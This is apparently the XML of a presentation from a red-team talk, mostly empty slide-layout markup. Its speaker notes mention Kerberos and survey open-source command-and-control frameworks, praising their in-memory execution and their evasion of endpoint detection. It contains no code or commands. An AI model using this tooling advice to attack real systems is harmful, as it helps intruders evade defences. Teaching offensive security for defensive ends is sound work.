          <p:cNvPr id="217" name="Shape 217"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Some kerberos terminology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1" name="Shape 221"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>So a little bit about command and control servers. I love having a good C2 infrastructure to work from, and there has been some great work in this space. No longer are the options between spending 3500 a year, developing you own, or having all your agents picked up by endpoint protections. There are now a lot of open source options, some that (at the moment) you can use right out the box and avoid detections, others take vary little obfuscation to achieve this. Here are a few of my favorites. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ST - Developed by b3ybl33d3r in python in boo lang. interface with .NET library. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Boolang is the love child between python and c#. Syntax is basically python except strongly typed. It can call native functions, so there are no calls to csc.exe TRULY IN MEMORY!!! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Just got a major update at DefCon. Now is a server/client. Works just like CS. Limited post exploitation modules, but it is super easy to port from existing projects. I am currently working on porting all of power view to boolang to use in ST. I have not made a PR yet, but when I get it finished I am going to put a fork up on my GitHub too. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Covenant - is a P2p C2 written in C#. It has a dope af web interface that is very intuitive to use. Works cross platform, just need dotnet core. Can write c# directly in the dashboard and have it compiled in memory. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Merlin is written in golang and communicates over http/2, which is not really monitored that much atm. I have not used this much, but wanted to include it because it has some cool features. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PoshC2 - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Easy to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Fairly stealthy, least stealthy on list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>‘YES WE HAVE AN IMPLANT’</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amp; Subtitle">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Line"/>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13" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="6426200"/>
            <a:ext cx="12192000" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="17000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Body Level One…"/>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15"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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102"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103" name="Body Level One…"/>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10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3 Up">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5463161" y="-90805"/>
            <a:ext cx="8585201" cy="5043805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5918717" y="4660900"/>
            <a:ext cx="7669766" cy="5219700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1016000" y="-12700"/>
            <a:ext cx="8860898" cy="9779000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Callout"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469900" y="2362200"/>
            <a:ext cx="12065000" cy="52292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24" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="0"/>
                  <a:pt x="0" y="232"/>
                  <a:pt x="0" y="516"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="18789"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="19073"/>
                  <a:pt x="100" y="19305"/>
                  <a:pt x="224" y="19305"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17228" y="19305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17850" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18471" y="19305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21376" y="19305"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21500" y="19305"/>
                  <a:pt x="21600" y="19073"/>
                  <a:pt x="21600" y="18789"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="516"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="232"/>
                  <a:pt x="21500" y="0"/>
                  <a:pt x="21376" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="224" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr cap="all" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="DIN Condensed"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Type a quote here."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="2908300"/>
            <a:ext cx="11226800" cy="1297944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr cap="all" sz="9400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="DIN Condensed"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Type a quote here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Johnny Appleseed"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="7789333"/>
            <a:ext cx="12192000" cy="863604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="DIN Condensed"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Johnny Appleseed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>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1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Alt">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Type a quote here."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892800" y="2641600"/>
            <a:ext cx="6705600" cy="2501900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr cap="all" sz="9400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="DIN Condensed"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Type a quote here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1016000" y="-12700"/>
            <a:ext cx="8860898" cy="9779000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Johnny Appleseed"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892800" y="7789333"/>
            <a:ext cx="6705600" cy="863604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="232323"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="DIN Condensed"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Johnny Appleseed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-914400" y="-12700"/>
            <a:ext cx="14814645" cy="9779000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14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bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1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Alt">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15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Horizontal">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-914400" y="-12700"/>
            <a:ext cx="14814645" cy="9779000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="406400" y="6140894"/>
            <a:ext cx="12192000" cy="263"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="6426200"/>
            <a:ext cx="12192000" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="17000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Body Level One…"/>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26"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Subtitle Alt">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Line"/>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34" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="6426200"/>
            <a:ext cx="12192000" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="17000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Body Level One…"/>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36" name="Slide Number"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12161859" y="4191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 Center">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="4038600"/>
            <a:ext cx="12192000" cy="4521200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="17000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44"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Vertical">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="222222"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5892800" y="6141012"/>
            <a:ext cx="6705600" cy="145"/>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52" name="Image"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1016000" y="-12700"/>
            <a:ext cx="8860898" cy="9779000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91439" tIns="45719" rIns="91439" bIns="45719">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892800" y="6426200"/>
            <a:ext cx="6705600" cy="2705100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="17000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892800" y="4267200"/>
            <a:ext cx="67056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55"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62"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63" name="Title Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
